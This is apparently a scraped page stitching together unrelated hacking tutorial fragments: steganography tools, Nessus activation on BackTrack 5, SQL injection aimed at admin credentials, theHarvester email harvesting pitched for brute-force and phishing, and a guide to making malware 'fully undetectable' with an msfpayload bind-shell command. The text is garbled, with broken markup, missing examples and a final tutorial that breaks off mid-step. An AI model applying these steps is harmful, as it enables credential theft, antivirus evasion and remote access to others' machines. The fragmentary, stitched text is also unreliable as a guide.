What is steganography?Steganography is defined as the art of hiding information, data or messages in an image. The advantage of steganography is that those who are outside the party even do not realize that some sort of communication is being done.
Steganography comes in different forms:
Hidden information in Text Files
Hidden information in Image Files
Hidden information in Document Files
Hidden information in Video Files
Hidden information in Audio Files
Hidden information in E-Mails
How to Hide File behind Images
Stools
S-Tools is a steganography tool that hides files in BMP, GIF, and WAV files.
Nessus 4.4.1 now comes pre-installed on BackTrack 5 and requires that the user activate the installation. Before you activate Nessus on your BackTrack 5 installation, be certain you have installed Nessus either to the hard drive on the computer you plan to use or inside of a virtual machine that you plan to keep on the same host system. If you activate Nessus on a bootable USB thumb drive, DVD or a virtual machine and move it to a new host system, the Nessus activation code will no longer be valid.
The Nessus activation ties itself to the physical system on which it is installed. If you do decide to move the virtual machine to a new system, or jump around to different systems using a bootable USB thumb drive or DVD, you will have to re-activate Nessus. If you are using a Nessus ProfessionalFeed, you are allowed to reset your activation by clearing the current connection between a host and an activation code.
By logging into the Tenable Customer Support Portal and going to "Activation Codes", you can reset the activation code-to-host pairing. ProfessionalFeed users are currently limited to one reset every 30 days. HomeFeed users will need to re-register Nessus when moving between physical hosts.
Step 1 - Obtaining An Activation Code
Once you have Nessus installed on BackTrack 5, you will need to obtain a Nessus activation code. If you wish to purchase a ProfessionalFeed, you can visit the Tenable Store. If you are using Nessus at home or wish to evaluate Nessus, you can register a HomeFeed. It’s important to note that the HomeFeed is limited to 16 IP addresses per scan (whereas the ProfessionalFeed allows you to scan an unlimited number of IP addresses). The ProfessionalFeed also gives you access to features such as Configuration and Sensitive Data Auditing, SCADA plugins, Nessus Technical Support and access to the Tenable Customer Portal.
Step 2 - Activating Nessus
Be certain that your BackTrack 5 installation has access to the Internet and activate Nessus using your newly obtained activation code as follows:
Click for larger image
As shown above, this will also initially download the appropriate plugins based on which feed you've chosen.
A SQL Injection, is basically a code injection that exploits the area vulnerable to SQL Injection. The injected code will be exploiting the Database, to get Information. Such as Emails, Usernames, Passwords, etc.
In this Tutorial, we’ll be looking for the Admin Panel’s credentials. Keep in mind, I said Admin Panel, not control panel. While performing an SQL Injection, you may not always find what you’re looking for. Some sites have secured the important information, so that it will not be compromised so easily.
Finding a Vulnerable Site
You can find a vulnerable site using Dorks. Use google, it’s the best way. A dork is something like this
There are Hundreds of Thousands of others, and there are also some Posts about Dorks, so you could read those if you want to find a good site to exploit with SQL Injection.
TheHarvester has been developed in Python by Christian Martorella. It is a tool which provides us information of about e-mail accounts, user names and hostnames/subdomains from different public sources like search engines and PGP key server.
This tool is designed to help the penetration tester on an earlier stage; it is an effective, simple and easy to use. The sources supported are:
Go to the Arsenal -] scanning -] web scanner -] theharvester.
In case, if it is not available in your distribution, than you can easily download it from http://code.google.com/p/theharvester/downlaod, where latest version 2.2 is available, simply download it and extract it.
Provide execute permission to the theHarvester.py by [chmod 755 theHavester.py]
After getting in to that, simply run. /theharvester, it will display version and other option that can be used with this tool with detailed description.
>The information gathering steps of footprinting and scanning are of utmost importance. Good information gathering can make the difference between a successful penetration test and one that has failed to provide maximum benefit to the client. We can say that Information is a weapon, a successful penetration testing and a hacking process need a lots of relevant information that is why, information gathering so called foot printing is the first step of hacking. So, gathering valid login names and emails are one of the most important parts for penetration testing. We can use these to profile our target, brute force authentication systems, send client-side attacks (through phishing), look through social networks for juicy info on platforms and technologies, etc.
h2>Example 1:
Command Syntax:
theHarvester -d [url] -l 300 -b [search engine name]
theHarvester -d matriux.com -l 300 -b google
In Above command:-
-d [url] will be the remote site from which you wants to fetch the juicy information.
-l will limit the search for specified number.
-b is used to specify search engine name.
From above information of email address we can identify pattern of the email addresses assigned to the employees of the organization. For example, some companies uses firstname.lastname@domain.com pattern, so that can be useful in order to brute force the account of a specific person. Host information can be useful in order to scan the specific system.
Example 2:
Search from all search engine.
Command:
theHarvester -d gtu.ac.in -l 300 -b all
This command will grab the information from multiple search engines supported by the specific version of theHarvester.
Example 3:
Save the result in HTML file. Command:
theHarvester.py -d gtu.ac.in -l 300 -b all -f hackguru
To save results in html file -f parameter is used as shown in this example.
Conclusion
theHarvester is a handy tool, which would quickly fetch the juicy information from the public resources by active or passive means.
Suggestion
Exposure of personal information is an advantage for every social engineer guy. Every information that you post on the Internet will eventually stay forever. So before you post something personal think twice if it is really necessary to allow other people to know about yourself and your activities. Also using different email addresses and usernames will make the work of social engineers much more difficult.
So in this tutorial we will show you step by step on how to make a virus Fully Undetectable from all the antiviruses. Their are lots of approaches, however here we will take a look at how to make an executable FUD using msfencode.
Requirements
Metasploit (comes on BackTrack or Kali)
Attention
We are using some harmless test files but don’t infect people with any real viruses. That would be a crime.
Purpose
Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus.
Creating a Listener
This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won’t spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:
cd msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe ls -l listen.exe
Here is a very easy tutorial on how to Extract email addresses from any site you want using metasploit. i'll not go in deep , em gona show it by step by step so then everyone can understand it easily.
start your Metasploit ...
1) First thing to do is open a msfconsole and type
